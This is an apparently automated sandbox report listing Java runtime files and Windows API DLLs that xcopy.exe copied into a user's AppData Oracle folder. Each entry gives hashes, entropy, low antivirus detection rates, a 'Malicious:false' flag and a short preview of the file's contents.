                                                                                                                                                                                              File Type:UTF-8 Unicode text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):149725
                                                                                                                                                                                              Entropy (8bit):5.017225619410427
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:Yj33DuJ8sY5sPfqN7amC35qs4NZ1G8OAN6Cflxocw+4oHHZZvcm9lHNOXG8A5oJt:HqN2p5i+cw+4oxH6N3Rj
                                                                                                                                                                                              MD5:6965EEEF8A55556BB1DDED43BCA822DD
                                                                                                                                                                                              SHA1:EFD8B1FD278FF3171686D4E170D0CEDC4DC1982C
                                                                                                                                                                                              SHA-256:7B3639E1EA1571B44F4DB53246950B6AB6CAAC9E4B067D95928E91293BB0A0FD
                                                                                                                                                                                              SHA-512:7E475A02D29F48A52C259D8CB3DD3D23B9F7002DF217D570F3125CAA815229DBE07ED4366EE93BCA1FC32E81E29B958DE2871DB9B776A4E8F44533CB5AC69C93
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: DO NOT TRANSLATE OR LOCALIZE..-----------------------------..%% This notice is provided with respect to ASM Bytecode Manipulation .Framework v5.0.3, which may be included with JRE 8, and JDK 8, and .OpenJDK 8...--- begin of LICENSE ---..Copyright (c) 2000-2011 France T.l.com.All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions.are met:..1. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...3. Neither the name of the copyright holders nor the names of its. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWAR
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\Welcome.html
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):955
                                                                                                                                                                                              Entropy (8bit):5.096095653697231
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:INMTdqcxtK4jXQ5VaJ2gjQo4pDW94m/DJn:TTdqIK4jXjJdso4V7E
                                                                                                                                                                                              MD5:810EF9BE9BDF09983D41E244A6179A20
                                                                                                                                                                                              SHA1:D98AE54F03DAC87419ABC19B97E315830C2DA55F
                                                                                                                                                                                              SHA-256:DB34008B34B4BC3177436E71BD01557D45D52E710699758AB227E5FEC7FFADB8
                                                                                                                                                                                              SHA-512:3DA4DE8D7A7D037AA64F9A771C9AEB743D43839294ACB773CECB2BA9B0C869CF3D7F3E3BC41D803238F297647E85ABD43F596F1C2DF46579EC0A34263744E406
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: <html>.<head>.<title>.Welcome to the Java(TM) Platform.</title>.</head>.<body>..<h2>Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Platform</h2>.<p> Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Standard Edition Runtime . Environment. This provides complete runtime support for Java applications. .<p> The runtime environment includes the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> . Plug-in product which supports the Java environment inside web browsers. .<h3>References</h3>.<p>.See the <a href="http://download.oracle.com/javase/7/docs/technotes/guides/plugin/">Java Plug-in</a> product.documentation for more information on using the Java Plug-in product..<p> See the <a href=."http://www.oracle.com/technetwork/java/javase/overview/".>Java Platform</a> web site for . more information on the Java Platform. .<hr>.<font size="-2">.Copyright (c) 2006, 2018, Oracle and/or its affiliates. All rights reserved..</font>.<p>.</body>.</html>.
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):15736
                                                                                                                                                                                              Entropy (8bit):6.1841491234044375
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:3cdMW5YN83XLPVT6ysMPGpcuaiMbL1tJx+wOp/uIfH0JOqsmVgz28WhBq/OkQfq:GM+97PVaaGpcuGj+Xt/8JN77hhu+C
                                                                                                                                                                                              MD5:C81B757A9C7E535FF7C995AAC9B26ADC
                                                                                                                                                                                              SHA1:1E933C3EC781AD6E3BC53A6C16FFB222817FB61E
                                                                                                                                                                                              SHA-256:3A3F04859A69E7156593EB34323E4818920BA2DE7DA5C6556C9AB518028F9259
                                                                                                                                                                                              SHA-512:100B8421B217E148EBAC9B856A6324FFC2A811FDDDFD2650E853930C47B88BFA8E20AC039D1EE4B144DE261BB0B91EBF88535C6F455D5D1B4159C571ED42D390
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.Z.[.Z.[.Z.[.A<..[.[.A<..Q.[.A<.._.[.S...X.[.Z.Z.D.[.A<..Y.[.A<..[.[.A<..[.[.A<..[.[.RichZ.[.................PE..L.....\...........!......................... ...............................`............@.........................`%......,"..P....@..x............"..x....P.. .... ............................... ..@............ ...............................text............................... ..`.rdata..d.... ......................@..@.data...`....0......................@....rsrc...x....@......................@..@.reloc..^....P....... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):128888
                                                                                                                                                                                              Entropy (8bit):6.409705724342423
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:ovAznTOzUca38u4HTK/e2Hrgc6kZAn1yEkBKMKy1Zf22QYHJiuzTl8ShzzM+64my:ovcwUca354ZnQ5zj
                                                                                                                                                                                              MD5:AD7C3D549B9DC43146400C294EDEECD0
                                                                                                                                                                                              SHA1:5FB491506339FDA6B973F26A24D8865EBC55B591
                                                                                                                                                                                              SHA-256:C4D19FE205A73193F1E5F3300C4D24FD2A5F58AF83E742C541C28E4CDD21E450
                                                                                                                                                                                              SHA-512:7FC1756C1E2B2A3FEE879B55562AD82AE820FB9D8E78E99784D74C256D3D327D144FBE21162FAA7B5F655C086D23D77F36EBD0FD5C22F9F96DC196D9E0819FE5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[d.@:.N@:.N@:.N[..NB:.N[..NB:.N[..NK:.NIB.NE:.N@:.N{:.N[..NG:.N[..NA:.N[..NA:.N[..NA:.NRich@:.N........PE..L.....\...........!................#...............................................|.....@.........................p...........P.......x...............x...........................................p...@............................................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...x...........................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):99192
                                                                                                                                                                                              Entropy (8bit):6.432934247604729
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:uQLZsxXloJQrrUQ+1IFiYls/q+X8Pik8PgVCsG080PssHfghEx:oVloJQrIQ+zYlsiFPdVCsr0sHLx
                                                                                                                                                                                              MD5:267EEF05571CD7A94BA730D0194A60AA
                                                                                                                                                                                              SHA1:361B9FEEC9429273377FF29C84B6158D686993A6
                                                                                                                                                                                              SHA-256:DCFA3C454D330D14B9481AA3EABBFA6A5203644891714D97D3B6D92ABBFC670D
                                                                                                                                                                                              SHA-512:3C8C69BF3618BF2D66F8754B2F126554EDD790B8029836B6235598B824BC24ACBBABB61BAE44ED45A573937EBBDE6316B1BD14E2917A397389E03C0C32D1C87E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./zR/k.<|k.<|k.<|p..|{.<|p..|2.<|bc.|n.<|k.=|7.<|p..|O.<|p..|j.<|p..|j.<|p..|j.<|Richk.<|........................PE..L.....\...........!.................v..............................................sP....@..........................8..A....1..<....................h..x............................................,..@...............@............................text...|........................... ..`.rdata..1g.......h..................@..@.data....,...P.......8..............@....rsrc................H..............@..@.reloc..N............P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18744
                                                                                                                                                                                              Entropy (8bit):7.080160932980843
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                                                                                                                                                                                              MD5:502263C56F931DF8440D7FD2FA7B7C00
                                                                                                                                                                                              SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                                                                                                                                                                                              SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                                                                                                                                                                                              SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                              Entropy (8bit):7.093995452106596
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                                                                                                                                                                                              MD5:CB978304B79EF53962408C611DFB20F5
                                                                                                                                                                                              SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                                                                                                                                                                                              SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                                                                                                                                                                                              SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                              Entropy (8bit):7.1028816880814265
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                                                                                                                                                                                              MD5:88FF191FD8648099592ED28EE6C442A5
                                                                                                                                                                                              SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                                                                                                                                                                                              SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                                                                                                                                                                                              SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                              Entropy (8bit):7.126358371711227
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                                                                                                                                                                                              MD5:6D778E83F74A4C7FE4C077DC279F6867
                                                                                                                                                                                              SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                                                                                                                                                                                              SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                                                                                                                                                                                              SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):21816
                                                                                                                                                                                              Entropy (8bit):7.014255619395433
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                                                                                                                                                                                              MD5:94AE25C7A5497CA0BE6882A00644CA64
                                                                                                                                                                                              SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                                                                                                                                                                                              SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                                                                                                                                                                                              SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                              Entropy (8bit):7.112057846012794
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                                                                                                                                                                                              MD5:E2F648AE40D234A3892E1455B4DBBE05
                                                                                                                                                                                              SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                                                                                                                                                                                              SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                                                                                                                                                                                              SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                              Entropy (8bit):7.166618249693435
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                                                                                                                                                                                              MD5:E479444BDD4AE4577FD32314A68F5D28
                                                                                                                                                                                              SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                                                                                                                                                                                              SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                                                                                                                                                                                              SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                              Entropy (8bit):7.1117101479630005
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                                                                                                                                                                                              MD5:6DB54065B33861967B491DD1C8FD8595
                                                                                                                                                                                              SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                                                                                                                                                                                              SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                                                                                                                                                                                              SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                              Entropy (8bit):7.174986589968396
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                                                                                                                                                                              MD5:2EA3901D7B50BF6071EC8732371B821C
                                                                                                                                                                                              SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                                                                                                                                                                              SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                                                                                                                                                                              SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):17856
                                                                                                                                                                                              Entropy (8bit):7.076803035880586
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                                                                                                                                                                              MD5:D97A1CB141C6806F0101A5ED2673A63D
                                                                                                                                                                                              SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                                                                                                                                                                              SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                                                                                                                                                                              SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18744
                                                                                                                                                                                              Entropy (8bit):7.131154779640255
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                                                                                                                                                                              MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                                                                                                                                                                              SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                                                                                                                                                                              SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                                                                                                                                                                              SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                                                                                                                                                                              Malicious:false
